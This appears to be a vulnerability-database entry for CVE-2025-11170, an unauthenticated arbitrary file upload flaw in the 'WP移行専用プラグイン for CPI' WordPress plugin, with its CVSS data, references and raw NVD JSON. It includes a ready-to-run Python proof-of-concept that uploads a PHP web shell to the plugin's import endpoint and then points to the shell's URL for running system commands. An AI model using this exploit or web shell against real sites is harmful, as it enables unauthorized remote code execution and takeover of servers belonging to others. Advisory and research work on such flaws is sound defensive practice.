CVE-2025-11170

Description

The WP移行専用プラグイン for CPI plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the Cpiwm_Import_Controller::import function in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP移行専用プラグイン for CPI <= 1.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-11170 PoC - WordPress CPI Plugin Arbitrary File Upload
# Target: WP移行専用プラグイン for CPI <= 1.0.2

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
upload_endpoint = f"{target_url}/wp-json/cpiwm/v1/import"

# Malicious PHP webshell content
webshell_content = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"

# Prepare the malicious file
files = {
    'file': ('shell.php', webshell_content, 'application/octet-stream')
}

try:
    print(f"[*] Attempting to upload malicious file to {target_url}")
    print(f"[*] Target endpoint: {upload_endpoint}")
    
    response = requests.post(upload_endpoint, files=files, timeout=10)
    
    if response.status_code == 200:
        print("[+] File upload appears successful!")
        print(f"[*] Try accessing: {target_url}/wp-content/uploads/shell.php?cmd=id")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11170
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11170
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11170/
[4] VulDB https://vuldb.com/cve/CVE-2025-11170
[5] https://wordpress.org/plugins/cpi-wp-migration/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11170", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:41.273", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP移行専用プラグイン for CPI plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the Cpiwm_Import_Controller::import function in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/cpi-wp-migration/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8a96d6d5-a5e3-4648-902b-f9d1f8e57e5c?source=cve", "source": "[email protected]"}]}}